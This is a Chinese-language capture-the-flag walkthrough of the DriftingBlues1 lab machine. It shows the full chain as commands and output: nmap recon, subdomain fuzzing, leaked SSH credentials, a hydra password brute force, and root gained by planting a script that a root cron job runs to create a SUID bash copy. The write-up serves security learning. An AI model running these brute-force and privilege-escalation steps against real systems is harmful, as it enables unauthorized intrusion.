打个靶机-driftingblues1

信息收集：

# Nmap 7.93 scan initiated Thu Jul 27 00:13:37 2023 as: nmap -sT -sC -sV -O -A -p22,80 -o nmap_details.txt 192.168.0.108

Nmap scan report for 192.168.0.108 (192.168.0.108)

Host is up (0.00064s latency).

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   2048 cae6d11f27f26298efbfe438b5f16777 (RSA)

|   256 a8589999f681c4c2b4da44da9bf3b89b (ECDSA)

|_  256 395b552a79edc3bff516fdbd61292ab7 (ED25519)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

|_http-title: Drifting Blues Tech

|_http-server-header: Apache/2.4.18 (Ubuntu)

MAC Address: 08:00:27:02:AA:91 (Oracle VirtualBox virtual NIC)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 3.1 (95%), Linux 3.2 (95%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#curl -i -L http://192.168.0.108

发现有一行奇怪的注释

<!-- L25vdGVmb3JraW5nZmlzaC50eHQ= -->

#echo 'L25vdGVmb3JraW5nZmlzaC50eHQ= ' |base64 -d

/noteforkingfish.txt

#wget http://192.168.0.108//noteforkingfish.txt

发现网页内容为：一串编码

web上查找解码器，解码后为：my man, i know you are new but you should know how to use host file to reach our secret location. -eric

意思为修改hosts文件以域名访问

修改/etc/hosts 192.168.0.108   driftingblues.box

进行域名爆破

#wfuzz -H 'HOST:FUZZ.driftingblues.box' -u 'http://192.168.0.108' -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt

发现hw多为570

wfuzz -H 'HOST:FUZZ.driftingblues.box' -u 'http://192.168.0.108' -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt --hw 570

执行后获得

000000016:   200        5 L      4 W        24 Ch       "test - test"

再次修改hosts文件

192.168.0.108   driftingblues.box  test.driftingblues.box

#dirb http://test.driftingblues.box

---- Scanning URL: http://test.driftingblues.box/ ----

+ http://test.driftingblues.box/index.html (CODE:200|SIZE:24)                                                               

+ http://test.driftingblues.box/robots.txt (CODE:200|SIZE:125)                                                              

+ http://test.driftingblues.box/server-status (CODE:403|SIZE:287)

爆破后发现robots.txt文件

Disallow: /ssh_cred.txt

Allow: /never

Allow: /never/gonna

Allow: /never/gonna/give

Allow: /never/gonna/give/up

访问/ssh_cred.txt

内容为：

we can use ssh password in case of emergency. it was "1mw4ckyyucky".

sheryl once told me that she added a number to the end of the password.

-db

建立字典：

wordlist.dir:

1mw4ckyyucky1

1mw4ckyyucky2

1mw4ckyyucky3

1mw4ckyyucky4

1mw4ckyyucky5

1mw4ckyyucky6

1mw4ckyyucky7

1mw4ckyyucky8

1mw4ckyyucky9

1mw4ckyyucky0

# hydra -l eric -P wordlist.dir 192.168.0.108 ssh

[22][ssh] host: 192.168.0.108   login: eric   password: 1mw4ckyyucky6

成功获得账号密码

ssh登录

运行pspy64脚本发现自动任务

2023/07/27 08:06:01 CMD: UID=0     PID=2058   | /usr/bin/zip -r -0 /tmp/backup.zip /var/www/

2023/07/27 08:06:01 CMD: UID=0     PID=2057   | /bin/sh /var/backups/backup.sh

2023/07/27 08:06:01 CMD: UID=0     PID=2056   | /bin/sh -c /bin/sh /var/backups/backup.sh

2023/07/27 08:06:01 CMD: UID=0     PID=2055   | /usr/sbin/CRON -f

2023/07/27 08:06:01 CMD: UID=0     PID=2059   | /bin/sh /var/backups/backup.sh

2023/07/27 08:06:01 CMD: UID=0     PID=2060   | sudo /tmp/emergency

查看backup.sh脚本内容：

#!/bin/bash

/usr/bin/zip -r -0 /tmp/backup.zip /var/www/

/bin/chmod

#having a backdoor would be nice

sudo /tmp/emergency

发现/tmp目录下未有emergency二进制文件

在/tmp目录下新建一个二进制可执行文件

emergency:

cp /bin/bash /tmp/rootbash

chmod u+s /tmp/rootbash

修改权限：

./rootbash -p

获得root权限

rootbash-4.3# cat root.txt

flag 2/2

░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄

░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄

░░░░█░░░░░░░░░░░░░░░░░░░░░░█

░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█

░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█

█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█

█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█

░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█

░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█

░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█

░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█

░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█

░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█

░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█

░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█

░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀

░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄

░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█

░░█░░▌░█░░█░░█░░░█░░█░░█

░░█░░▀▀░░██░░█░░░█░░█░░█

░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

thank you for playing